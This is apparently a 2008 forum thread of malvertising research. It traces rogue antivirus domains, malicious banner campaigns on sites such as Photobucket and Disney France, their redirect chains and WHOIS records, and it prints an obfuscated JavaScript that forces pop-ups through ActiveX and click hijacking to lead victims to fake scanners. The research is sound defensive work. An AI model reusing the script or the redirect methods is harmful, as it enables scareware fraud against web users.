Sistemupyua.com
Sisutemuantei.com
Sisutemuorugurin.com
Skyddsprogram.com
Solelunaantivirus.com
Spyguardpro.com
Spywaretaisakumaster.com
Stopbedreiging.com
Stopminacce.com
Succesantivirus.com
Superanonimo.com
Surfforsure.com
Surfremover.com
Sutoppuwirusu.com
Syssauvegarde.com
Systemerrorfixer.com
Systemesansfaute.com
Systemhoover.com
Systemschild.com
Tackanejvirus.com
Tilforlatelig.com
Toolsicuro.com
Topsalgantivirus.com
Trasheraser.com
Trojansdestroyer.com
Trusselovervagning.com
Tryggpcverktyg.com
Turnkeyantivirus.com
Unidadessanas.com
Usuarioprotegido.com
Vaktmotvirus.com
Veiligheidsagent.com
Virenvernichter.com
Virusbekaemper.com
Viruskrakker.com
Virussperr.com
Volumformatredskap.com
Wirusufinisshu.com
Wirusuk.com
Wirusukyua.com
Wirusushattodaun.com
Wirusushuryo.com
Yourprivacyguard.com
Yuzasefu.com
Zentaiwakuchin.com
Nettoyeurdevirus.com

c-net 89.18.181
http://www.robtex.com/cnet/89.18.181.html

Kimberly

Apr 30 2008, 10:14 PM

Estdomains ... Bad To The Bone

Estdomains ... as if selling malicious adverts to Yahoo ain't enough; hey why not earn a few bucks more when you know that people will use search engines to find & solve similar problems ...

Scenario.

I got a malicious redirect on Yahoo, I search the web for similar problems.

Act.

Fire up Google, keywords: Yahoo banner redirects. Let's admit you click on the second link because the description is very similar to what you did experience ...

Hmm, the page we see doesn't reflect what we saw in google. Instead we land on another search engine.

Ah well, lets close the window then. Oh NO ... not again ... not another alert. Sorry to say so but yes ... unfortunately exactly the same type of alert we see with the malicious Flash banners.

Where the hell did this came from?

We need to examine the source code of the webpage we asked for - abc01.my5gb.com/yahoo-pi0a/yahoo-banner-ads.html - A quick look reveals the presence of a script before the webpage is loaded.

We are redirected to w1_abc01m_yahoo-pi0a.teachingrank.net/images/header.php which contains a function called LoadAd which redirects us to abc01m_yahoo-pi0a.teachingrank.net/index.html

index.html contains another script that lead us to fastwebway.com/exit.php?aid=0253&d=3&product=XPA
That page contains a rather complex script, checking different things ...

CODE
var url2go="http://fastwebway.com/soft.php?aid=0253&d=3&product=XPA";var
axkoord=new Array();var AXsizeres=new Array();function blockError(){return
true;}
window.onerror=blockError;if(window.SymRealWinOpen){window.open=SymRealWinOpen;}
if(window.NS_ActualOpen){window.open=NS_ActualOpen;}if(typeof
(usingClick)=="undefined"){var usingClick=false;}if(typeof
(usingActiveX)=="undefined"){var usingActiveX=false;}if(typeof
(popwin)=="undefined"){var popwin=null;}
if(typeof (poped)=="undefined"){var poped=false;}var blk=1;var
setupClickSuccess=false;var googleInUse=false;var pop="enter";var
myurl=document.location.protocol+"//"+document.location.host;var durl="";var
MAX_TRIED=20;var activeXTried=false;var tried=0;var randkey="0";var myWindow;var
popWindow;var usingAXSuccess=0;
function
usingAX(){if(usingActiveX){try{if(usingAXSuccess<5){document.writeln("<DIV><OBJE
CT ID=\"OurPopupObject\" CLASSID=\"clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A\"
WIDTH=\"1\" HEIGHT=\"1\" STYLE=\"position: absolute; top: 0; left:
0;\"></OBJECT></DIV>");document.write("<INPUT STYLE=\"display:none;\"
ID=\"autoHit\" TYPE=\"TEXT\"
ONKEYPRESS=\"showActiveX()\">");popWindow=window.createPopup();
popWindow.document.body.innerHTML="<DIV ID=\"objectRemover\"><OBJECT
ID=\"getParentDiv\" STYLE=\"position:absolute;top:0px;left:0px;\" WIDTH=1
HEIGHT=1 DATA=\""+myurl+"/popuppopup.html\"
TYPE=\"text/html\"></OBJECT></DIV>";usingAXSuccess=6;}}catch(e){if(usingAXSucces
s<5){usingAXSuccess++;setTimeout("usingAX();",500);}else{
if(usingAXSuccess==5){activeXTried=true;setupClick();}}}}}function
tryActiveX(){if(!activeXTried&&!poped){try{OurPopupObj=document.getElementById("
OurPopupObject");OurPopupObj.DOM.Script.execScript("function paypopupPop()
{return
window.open('about:blank','Ads','scrollbars=no,resizable=no,menubar=no,location=
no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+
AXsizeres["h"]+"');}");popwin=OurPopupObj.DOM.Script.paypopupPop();
if(popwin){popwin.location=url2go;poped=true;}if(usingAXSuccess==6&&googleInUse&
&popWindow&&popWindow.document.getElementById("getParentDiv")&&popWindow.documen
t.getElementById("getParentDiv").object&&popWindow.document.getElementById("getP
arentDiv").object.parentWindow){myWindow=popWindow.document.getElementById("getP
arentDiv").object.parentWindow;
}else{if(usingAXSuccess==6&&!googleInUse&&popIframe&&popIframe.getParentFrame&&p
opIframe.getParentFrame.object&&popIframe.getParentFrame.object.parentWindow){my
Window=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace("
about:blank");}else{setTimeout("tryActiveX()",200);
tried++;if(tried>=MAX_TRIED&&!activeXTried){activeXTried=true;setupClick();}retu
rn;}}openAXsc();window.windowFired=true;}catch(e){setTimeout("tryActiveX()",200)
;tried++;}}}function
openAXsc(){if(!activeXTried&&!poped){if(myWindow&&window.windowFired){window.win
dowFired=false;document.getElementById("autoHit").fireEvent("onkeypress",(docume
nt.createEventObject().keyCode=escape(randkey).substring(1)));}else{
setTimeout("openAXsc();",100);}tried++;if(tried>=MAX_TRIED){activeXTried=true;se
tupClick();}}}function
showActiveX(){if(!activeXTried&&!poped){if(googleInUse){window.daChildObject=pop
Window.document.getElementById("objectRemover").children(0);window.daChildObject
=popWindow.document.getElementById("objectRemover").removeChild(window.daChildOb
ject);}newWindow=myWindow.open(url2go,"mywinv23","scrollbars=no,resizable=no,men
ubar=no,location=no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres
["w"]+",height="+AXsizeres["h"]);if(newWindow){newWindow.blur();activeXTried=tru
e;poped=true;
}else{if(!googleInUse){googleInUse=true;tried=0;tryActiveX();}else{activeXTried=
true;setupClick();}}}}function
paypopup(){if(!poped){if(!usingClick&&!usingActiveX){popwin=window.open(url2go,"
mywinv23","scrollbars=no,resizable=no,menubar=no,location=no,top="+axkoord["y"]+
",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+AXsizeres["h"]);if(pop
win){poped=true;}}}if(!poped){if(usingActiveX){tryActiveX();}else{setupClick();}
}}function setupClick(){if(!poped&&!setupClickSuccess){
if(window.Event){document.captureEvents(Event.CLICK);}prePaypoponclick=document.
onclick;document.onclick=gopop;setupClickSuccess=true;}}function
gopop(){if(!poped){popwin=window.open(url2go,"mywinv23","scrollbars=no,resizable
=no,menubar=no,location=no,top="+axkoord["y"]+",left="+axkoord["x"]+",width="+AX
sizeres["w"]+",height="+AXsizeres["h"]);if(popwin){poped=true;}}if(typeof
(prePaypoponclick)=="function"){prePaypoponclick();}}function
detectGoogle(){if(usingActiveX){try{document.write("<DIV
STYLE=\"display:none;\"><OBJECT ID=\"detectGoogle\"
CLASSID=\"clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB\" STYLE=\"display:none;\"
CODEBASE=\"view-source:about:blank\"></OBJECT></DIV>");googleInUse|=(typeof
(document.getElementById("detectGoogle"))=="object");
}catch(e){setTimeout("detectGoogle();",50);}}}function version(){var os="W0";var
bs="I0";var _3=false;var
_4=window.navigator.userAgent;if(_4.indexOf("Win")!=-1){os="W1";}if(detectSP2())
{bs="I2";}else{if(_4.indexOf("Opera")!=-1){bs="I0";}else{if(_4.indexOf("Firefox"
)!=-1){bs="I0";}else{if(_4.indexOf("Microsoft")!=-1||_4.indexOf("MSIE")!=-1){bs=
"I1";}}}}if(top!=self){_3=true;}url2go=url2go;usingClick=blk&&((detectSP2())||(_
4.indexOf("Opera")!=-1)||(_4.indexOf("Firefox")!=-1));usingActiveX=blk&&(detectS
P2())&&!(_4.indexOf("Opera")!=-1)&&((_4.indexOf("Microsoft")!=-1)||(_4.indexOf("
MSIE")!=-1));detectGoogle();
}function detectSP2(){return
(window.navigator.userAgent.indexOf("SV1")!=-1||(navigator.appMinorVersion&&(nav
igator.appMinorVersion.indexOf("SP2")!=-1)));}version();function
ParseParams(_5,_6){var _7=_5.split(/\b\s*;\s*\b/);for(var
i=0;i<_7.length;i++){var
_9=_7[i].split(/\b\s*(=|\:)\s*\b/);axkoord[_9[0]]=_9[_9.length-1];}var
_a=_6.split(/\b\s*;\s*\b/);for(var i=0;i<_a.length;i++){var
_9=_a[i].split(/\b\s*(=|\:)\s*\b/);AXsizeres[_9[0]]=_9[_9.length-1];}}function
loadingPop(){ParseParams("x:0; y:0","w:"+window.screen.width+";
h:"+window.screen.height);if(!usingClick&&!usingActiveX){paypopup();}else{if(usi
ngActiveX){tryActiveX();}else{
setupClick();}}popwin.focus();}if(myurl==""){myurl=".";}usingAX();var
tergetURL=url2go;var exit=true;function sTb(){ParseParams("x:0;
y:0","w:"+window.screen.width+";
h:"+window.screen.height);if(exit){Player.controls.play();stb.DOM.Script.window.
open(tergetURL,"_blank","scrollbars=no,resizable=no,menubar=no,location=no,top="
+axkoord["y"]+",left="+axkoord["x"]+",width="+AXsizeres["w"]+",height="+AXsizere
s["h"]);if(window.attachEvent&&document.googleBar&&typeof
(googleBar.Search)!="undefined"){window.focus();}Player.controls.stop();window.f
ocus();}}window.onbeforeunload=sTb;document.write("<object id=Player
classid=\"CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6\" width=\"0\"
height=\"0\">");document.write("<param name=\"URL\" value=\"about:blank\">");
document.write("<PARAM name=\"uiMode\" value=\"none\">");document.write("<param
name=\"autoStart\" value=\"false\">");document.write("<param
name=\"ShowStatusBar\" value=\"0\"></object>");document.write("<object
id=\"stb\" classid=\"clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A\" width=0
height=0></object>");

Anyways ... when we close the initial search window, we get our fake scanner warning and jump to onlinexpscanner.com/2008/3/freescan.php?aid=880253

Domains

abc01.my5gb.com - 66.96.249.86

IP Location - Queensland - Brisbane - Lithoptix

Domain Name: MY5GB.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Name Server: NS1.MY5GB.COM
Name Server: NS2.MY5GB.COM
Status: clientTransferProhibited
Updated Date: 27-feb-2008
Creation Date: 22-may-2007
Expiration Date: 22-may-2009

Name Servers:
ns1.my5gb.com
ns2.my5gb.com
______________________________

abc01m_yahoo-pi0a.teachingrank.net - 89.149.227.25

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217

Domain Name: TEACHINGRANK.NET

Server Type: Apache/2.2.3 (CentOS)
IP Location - Berlin - Berlin - Netdirekt E.k
Reverse IP: 48 other sites hosted on this server

Registrant:
Hampton
William M (WilliamMHampton@fontdrift.com)
112 Shady Pines Drive
Radcliff
Gulzhou,40160
CN
Tel. +270.9492330
Fax. +270.9492330

Creation Date: 19-Apr-2008
Expiration Date: 19-Apr-2009

Domain servers in listed order:
ns3.itsfreedns.com
ns2.itsfreedns.com
ns1.itsfreedns.com
______________________________

onlinexpscanner.com - 72.233.40.58

Website Title: XP antivirus protection - Official web site
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-03-20
Expires: 2009-03-20
Name Server: NS1.MYNICK.NAME (has 1,114 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

Server Type: Apache
IP Location - Texas - Plano - Layered Technologies Inc
Dedicated Hosting: onlinexpscanner.com is hosted on a dedicated server.
______________________________

fastwebway.com - 72.36.198.5

Website Title: 403 Forbidden
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-13
Expires: 2009-03-13
Name Server: MANAGEDNS1.ESTBOXES.COM (has 8,057 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

Server Type: Apache
IP Location - New York - New York - Layered Technologies Inc
Dedicated Hosting: fastwebway.com is hosted on a dedicated server.

Seen on March 23th - Ref.
______________________________

teachingrank.net being created on 19 th April 2008 ... isn't that a coincidence ...

Kimberly

May 7 2008, 08:25 PM

imunizator.com

Ref: http://www.bluetack.co.uk/forums/index.php...ost&p=86697

Cache Date: 2008-05-01.

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Current Record.

Registrant:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Registrant Search: "Ind" owns about 256 other domains

Thanks for the hint.

Kimberly

May 8 2008, 05:29 PM

photobucket.com

A warning about photobucket.com was issued again to Sandi's blog.

Photobucket isn't displaying 1 but at least 2 malicious banners.

The first advertisment is featuring Lady Speedstick again.

Screenshot in situ.

Banner.

atlas-ads.com/99000/728x90.swf

Campaign.

track.trackads.net/statsa.php?campaign=99000&u=1210261259237
track.trackads.net/swf/gnida.swf?campaign=99000&u=1210261259237&
paramss=[removed]

track.trackads.net/statss.php?campaign=99000&u=1210261259237&
paramss=[removed]

tds.maxconvert.com/?paramss=[removed]
adtds.trackads.net/in.cgi?2&depid=maxc_clr08&cid=2271&parid=mc_4087630891&
spywaredestructor.com/scanner/scan.php?landid=3&depid=maxc%5Fclr08&cid=2271&parid=mc%5F4087630891&bs=1
spywaredestructor.com/scanner/scan.php?landid=3&depid=maxc%5Fclr08&cid=2271&parid=mc%5F4087630891

______________________________

The second malicious banner is an advertisement for The Fast & The Furious - Tokyo Drift.

Screenshot in situ.

Banner.

photobkt-images.adbureau.net/photobkt/cinema_photobucket_728x90.swf

Campaign.

adoptserver.info/ad0.php?url=http://a1356.g.akamai.net/7/1356/2850/20060508201709/&c=567890057

iexplorer-security.org/?id=987650057

At the time of the write up, the campaign is active and redirects to the following URL's:

fastwebway.com/soft.php?aid=024204&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77024204

This is the redirect reported at the photobucket forums.

atlas-ads.com

As usual, the 300x250 size of the Lady Speedstick banner is present on atlas-ads.com.

Banner.

atlas-ads.com/99000/300x250.swf

Campaign.

track.trackads.net/statsa.php?campaign=99000&u=1210261259237

Note: This is the same campaign as the 728x90 banner.

Kimberly

May 8 2008, 11:13 PM

Interesting ... media2.mediafileshost.com

I was going over some network captures when the following domain / URL related to the photobucket redirects did catch my attention.

media2.mediafileshost.com/images/prep_ctr.php?imgfile=8047_562504_7245898_90_728.html&partnerId=[removed]&appId=[removed]&advertiserId=[removed]&keywordId=[removed]&type=[removed]&uuid=[removed]&keyword=[removed]&matchedBy=[removed]&redirectUrl=http%3A%2F%2Fjavascript

Note: I removed the additional parameters since only the bolded part is of interest.

And what did I spot there ... an iframe leading to the infamous atlas-ads.com. Nothing special you might say because many ads are displayed this way. But read on ...

CODE
<IFRAME WIDTH="728" HEIGHT="90" MARGINWIDTH="0" MARGINHEIGHT="0" HSPACE="0" VSPACE="0" FRAMEBORDER="0" SCROLLING="no"
SRC="http://atlas-ads.com/engine?size=728x90&campaign=99000&
clickurl=http://www.colgate.com/app/LadySpeedStick/US/HomePage.cvsp&linktarget=_blank"></IFRAME>

media2.mediafileshost.com - 66.179.234.173

Domain Name: MEDIAFILESHOST.COM
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Name Server: NS1.MYGEEK.COM
Name Server: NS3.MYGEEK.COM
Updated Date: 15-feb-2008
Creation Date: 15-feb-2008
Expiration Date: 15-feb-2010

CustName: myGeek.com
Address: 120 E. Van Buren Street 2nd Floor West, Suite 202
City: Phoenix
StateProv: AZ
PostalCode: 85004
Country: US
RegDate: 2004-09-21
Updated: 2004-09-21
______________________________

Mediafileshost.com - 66.104.86.4

Website Title: None given.
ICANN Registrar: GODADDY.COM, INC.
Created: 2008-02-15
Expires: 2010-02-15
Name Server: NS1.MYGEEK.COM (has 22 domains)
Name Server: NS3.MYGEEK.COM
Whois Server: whois.godaddy.com

IP Location - United States - Xo Communications

Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Domain Name: MEDIAFILESHOST.COM
Created on: 15-Feb-08
Expires on: 15-Feb-10
Last Updated on: 15-Feb-08
______________________________

Can't say I like these domains a lot for several reasons, not to mention that at least 1 other issue was reported on 4th April 2008 on the softpedia forums; media2.mediafileshost.com with a similar URL and the mention "You privacy is in danger". Unfortunately I have no idea which language is spoken in the post.

Seeing it's a privacy protected record, I would advise extreme caution.

Kimberly

May 8 2008, 11:45 PM

www.mininova.org

Nielsen banner present on www.mininova.org.

Banner & Screenshot in situ.

d3.zedo.com/OzoDB/8/e/407122/V1/nielsen_120x600.swf

Campaign.

adoptserver.info/crossdomain.xml
adoptserver.info/ad0.php?url=http://a1356.g.akamai.net/7/1356/2850/20060508201709/&c=567890067
iexplorer-security.org/?id=987650067
mystats.com/crossdomain.xml

At the time of the write up, the campaign is active and redirects to the following URL's:

fastwebway.com/soft.php?aid=024211&d=1&product=XPA
xponlinescanner.com/2008/3/freescan.php?aid=77024211

d3.zedo.com

d3.zedo.com is Akamai hosted content ...

canonical name a456.g.akamai.net.
aliases d3.zedo.com
d3.zedo.com.edgesuite.net

Updated 05:59 AM: Added in situ screenshot.

Kimberly

May 9 2008, 01:19 AM

www.rlslog.net

Travel banner present on www.rlslog.net aka Releaselog. The banner isn't new, it was first reported by Sandi on Apr 3 2008 and seen on photobucket on Apr 12 2008.

Screenshot in situ.

Banner.

content.yieldmanager.edgesuite.net/atoms/d0/e4/38/21/d0e4382110fedd6e68c86c5f1febe683.swf

Campaign.

stathome.net/c/index.php? id=eWthVEdIdkFTY0RBcXpPQjm7NkiZ0Ym9oPTEyMDc2NTY3NzEmcG56Y252dGE9dmFmbmVxYmF2cAYN
kiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=insardonic&adid=intl

This is exactly the same advertising link and campaign as spotted on photobucket on Apr 12 2008.

It's unacceptable that an identified banner is still rotating after 1 month it was first reported.

Kimberly

May 10 2008, 04:02 PM

photobucket.com - slow cleanup!!!

On 8 May 2008 we discovered two malvertisements on photobucket. - Ref - Today, I got hit by the ladyspeedstick banner again.

Screenshot in situ.

On the 8th May, photobucket was alerted through the "Contact Us" form as requested on their forums.

They replied very fast to the information I did forward via the Contact form.

QUOTE
Dear Kimberly @ Photobucket Forums,

Thank you so much for sharing all of this information with us. It has been
passed on to our Advertisement team. They will contact you if they have
further questions.

Sincerely,

Your Photobucket Support Team

------
Online Help Center: http://photobucket.com/tips.php
FAQ's: http://photobucket.com/faq
Support Forums: http://forums.photobucket.com
Support Email: support@photobucket.com

If only the Advertisement Team would have been so speedy too ... people would be able to surf without exasperation.

At the time of the write up I have no idea if the malvertisement for The Fast & The Furious - Tokyo Drift has been removed. If anyone still encouters the banner, drop us a note please. Thanks.
______________________________

Updated 20:52 PM

WTF are they doing at Photobucket ? They got all the details !!!
http://forums.majorgeeks.com/showpost.php?...amp;postcount=5

Kimberly

May 12 2008, 03:04 PM

photobucket.com - still not fixed

This is getting ridiculous, I did browse 1 page and what popped up ... yep the malvertisement for The fast and The Furious - Toyko drift.

Screenshot in situ.

Is it so difficult to remove those banners from circulation? We did send them all the details, other people did the same thing. This slowness is simply NOT ACCEPTABLE. The banners have been identified 4 days ago!!!

Adopstool tests.

www.rlslog.net

The banner isn't rotating anymore. The direct link to the malvertisment is still active though at the time of the write up.

www.mininova.org

Thanks to the prompt reaction of Niek (admin), the banner has been disabled very fast, so that issue is now officially fixed. - Annoucement.

Kimberly

May 14 2008, 05:40 PM

Speedbit banner

Forwarded by a contact.

Banner.

Campaign.

page2.googiesindication.com/c/index.php? id=cm5DRWVaWWdjU0djeld3NjM2SmpoPTEyMTA2NzQwNjEmcG56Y252dGE9dnNwbGVyYW52cAYNkiDgN
mYNkiDgNm

waytotheprofit.com/?cmpid=ifcyrenaic

The banner itself isn't new. It was first seen on Mar 12 2008.
page2.googiesindication.com was associated with a banner from ForceUp - Desperately Seeking Buyers ....

In this case, the person was approached by Tiffany Moon from Proximogroup. They have been involved in several cases of malvertisments in the past. - Ref.

Proximogroup.com shares the same IP as 4cetera.com who has been caught selling malicious banners in the past also. - Ref.

130.117.78.25

4cetera.com
Proximogroup

photobucket.com - Tokyo Drift malvert

If they can't fix it, try to fix it yourself ... which has been done with success by Sandi. - Ref.

Tokyo Drift has been cleaned up but we are not able to confirm if the Lady Speedstick banner has been removed or not at the time of the write up.

Kimberly

May 18 2008, 08:38 PM

Ringtones - Updated Campaign

Forwarded by a contact. The 728x90 banner, linked to a different campaign, was first seen on Apr 3 2008.

Associated URL's.

openadstream.net/ad0.php?url=[removed]

xp-vista-update.net/?id=174400150

At the time of the write up, xp-vista-update.net/?id=174400150 redirects to Google.

Kimberly

Jun 3 2008, 02:40 PM

Ebooks - New Banner

Forwarded by a contact.

Banner.

Campaign.

stathisranch.com/crossdomain.xml
stathisranch.com/c/index.php? id=a3IzT2xJNUJnVGhUNkm7NkiZ0Tkp0ME9oPTEyMTA5MzY5NDEmcG56Y252dGE9b2Jib2J2m7NkiZnm
7NkiZyNgYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=booboisie6&adid=intl

adnetserver.com/?cmp=tmsmsposl&poa=booboisie6&pol=intl&apo=1&epo=1&edpo=2&mt_info=6019_7908_19338&rdr=1

performanceoptimizer.com/.landing?cmp=tmsmsposl&poa=booboisie6&[removed]

stats.sellmosoft.net/pos_id_performanceoptimizer/poa_booboisie6_pot103s_fr_en_edpo2/pol_intl/por_/lp_true/stats.php

Kimberly

Jun 8 2008, 02:59 PM

New survey banner

Forwarded by email.

Banner.

Associated URLS.

impressiontracker.com/url/sc_6.php

yourredirect.com/soft.php?aid=000417&d=3&product=XPA
onlinescannerxp.com/2008/3/freescan.php?aid=[removed]

impressiontracker.com - 89.149.253.221

impressiontracker.com/url/sc_6.php

CODE

HTTP/1.1 200 OK
Date: Sun, 08 Jun 2008 13:26:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Length: 0
Connection: close
Content-Type: text/html

Getting the content triggers an IDS intrusion attempt stating invalid TCP/IP options.

impressiontracker.com - 89.149.253.221

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-04-08
Expires: 2009-04-08
Name Server: NS1.MYNICK.NAME (has 2,247 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com
Server Type: Apache
IP Address: 89.149.253.221
IP Location - Germany - Netdirekt E.k

Registrant Search: "eosads" owns about 4 other domains.
Dedicated Hosting: impressiontracker.com is hosted on a dedicated server.

Domain Name: IMPRESSIONTRACKER.COM

Creation Date: 08-Apr-2008
Expiration Date: 08-Apr-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
eosads
Carol Hamilton carol(at)eosads.com
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +02.089446866

yourredirect.com - 72.233.40.59

Website Title: 404 - Not Found
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-04-04
Expires: 2009-04-04
Name Server: NS1.MYNICK.NAME (has 2,247 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

Server Type: lighttpd
IP Address: 72.233.40.59
IP Location - Texas - Plano - Layered Technologies Inc

Dedicated Hosting: yourredirect.com is hosted on a dedicated server.

Domain Name: YOURREDIRECT.COM

Creation Date: 04-Apr-2008
Expiration Date: 04-Apr-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Last updated on 2008-05-26

eosads.com - 216.195.62.169

Website Title: EOSads - Internet Marketing and Online Advertising Agency
ICANN Registrar: ESTDOMAINS, INC.
Created: 2007-02-08
Expires: 2009-02-08
Name Server: DNS273.3FN.NET (has 10,885 domains)
Name Server: NS2.3FN.NET
Whois Server: whois.estdomains.com

Server Type: Apache/2.2.3 (CentOS)
IP Address: 216.195.62.169
IP Location - California - San Anselmo - Aps Telecom

Reverse IP: 85 other sites hosted on this server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: EOSADS.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 08-Feb-2007
Expiration Date: 08-Feb-2009

Domain servers in listed order:
ns2.3fn.net
dns273.3fn.net

IPB Image

Full List of "Customers".
21st Century Insurance
America West Vacations
Avenue
Back in the Saddle
BBC America
Beauty.com
British Airways Holidays
Cambridge Soundworks
Dick Blick Art Materials
Discover Card
EssayEdge
Flaxart
Haband
Hooked on Phonics
Hotwire
iFLOOR
iMaternity
iPrint
Jockey
Johnson Smith
Jostens
Keen
Linens 'n Things
Liz Claiborne
Maidenform
Max Studio
MusicMatch
National Geographic
Network Solutions
NetZero
Origins
Palm Store
PeoplePC
Pine Meadow Golf
Pitney Bowes
Rail Europe
S&S Worldwide
SBC Communications
SeaBear Smokehouse
Shindigz by Stumps
Springhill Nursery
The Apple Store
The House
The Tire Rack
Thomas Pink
Vermont Country Store
Warner Bros.
Weight Watchers
Yahoo! Personals
Zappos
If the above "customers" list is real, may I suggest EVERYONE checks ALL the creatives received from EOSads !!!

Other Websites.

123-webdesigner.info
18teensexy.info
Alice-cms.com
Allmp3online.com
Avtosvoboda.com
Beaufortcomputerclub.org
Benjenonline.com
Betterhere.info
C5jd.info
Computerstoremarket.net
Cuny69.info
Deanhooper.info
Debt-settlement-programs.com
Develareel.com
Develareel.org
Dominicana-tur.com
Dongless.com
Drug-test-assistant.com
Edesignstudio.org
Eosads.com
Freeebayguide.net
Freehotportal.info
Freehotportal.net
Freestuffbest.com
Funphonesdirect.net
Global-financialsmart.com
Globalfinancialsmart.com
Goatweedsite.com
Goldlove69.info
Greatmobilephones.net
Harrymerlot.com
Hellfire.com
Hotadultblogs.info
Hotmaturevids.info
Ilifeinsurance.info
Isf2003.org
Jaghealth.com
Jobpenguin.com
Klikwarez.com
Knowfilter.com
Kxtrlive.com
Lipsmix.com
Malaki.biz
Maturesucking.info
Megaarticles.info
Megacool69.info
Monplaisire.com
Mp3-fiesta-download.com
Musicalequipmentmarket.net
Musicalstoredirect.net
Mypornreel.com
Paidsexvideos.com
Pharma-care4everyone.com
Phentermine375mg.net
Phentermine375noprescription.com
Phenterminewithoutaprescription.net
Pilgrim-worldtour.com
Platinumbank.biz
Pornozoooom.info
Postsalotspeaks.com
Realarchive.info
Rurez.net
Russian-bdsm.info
Tatushki.info
Thriftist.org
Toursleuth.com
Ullikummi.net
Vashotdyh.com
Western-contact.net
Worldphonesdirect.net
Yamatobikes.com
Zippedarticles.com
Zithromaxwithoutprescription.org
Zocorwithoutprescription.com
Zummedia.com
Zylant.com
Aristarh.info
Derbydolls.info
Devde.info
Gagngapeonthebitch.info
Gammaloader.net
Gigantiksurp.info
Glazedbyme.info
Timokratia.info
Trymeout.info
Twinklagoon.com

Kimberly

Jun 8 2008, 05:13 PM

home.disney.fr

Two updated CinemaNow malvertizements are present and active on Disney France - website home.disney.fr

Screenshot in situ.

Banner n°1.

openad.tf1.fr/RealMedia/ads/Creatives/OasDefault/AUTOPROMO_DISNEY_MEGA_CINEMA_NOW/cinemanow_728x90.swf

Campaign.

adoptserver.info/_stat029.gif?url=[removed]

windowsxp-privacy.net/?id=987650097
xponlinescanner.com/soft.php?aid=024218&d=3&product=XPA
xponlinescanner.com/2008/3/freescan.php?aid=77024218

______________________________

Banner n°2.

openad.tf1.fr/RealMedia/ads/Creatives/OasDefault/AUTOPROMO_DISNEY_SKY_CINEMA_NOW/cinemanow_120x600.swf

Campaign.

adoptserver.info/_stat029.gif?url=[removed]

windowsxp-privacy.net/?id=987650098
xponlinescanner.com/soft.php?aid=024217&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77024217

______________________________

canonical name oas.mephisto.jmsp.net.
aliases openad.tf1.fr
addresses 212.23.180.17

212.23.180.17 - Jetmultimedia France

The RealMedia creatives are hosted by TF1, so they might show up on other French websites. Caution is adviced.

Note: Special thanks to Malekal_morte who asked for additional details when reported here.

Caution

A word of caution to those manipulating the SWF files for analysis. The creative reports back to 216.195.62.80 as seen below.

Note: The name of the application has been removed on purpose.

216.195.62.80 is located in the same range as eosads.com (216.195.62.169)

IP Information for 216.195.62.80

OrgName: APS Telecom
OrgID: APSTE
Address: 8130 SW BEAVERTON-HILLSDALE HWY
City: PORTLAND
StateProv: OR
PostalCode: 97225
Country: US
NetRange: 216.195.32.0 - 216.195.63.255
CIDR: 216.195.32.0/19
NetName: APS-EPSI
NetHandle: NET-216-195-32-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.3FN.NET
NameServer: NS2.3FN.NET

Websites.

Adoptserver.info
Articleseasy.info
Bestsporno.info
Burumba.net
Flanp.info
Flatq.info
For-ease.com
Futurecho.com
Itradeport.com
Krevedkoff.com
Kvartirstroy.com
L12.biz
Memberpass.info
Miroor.net
Mirosite.com
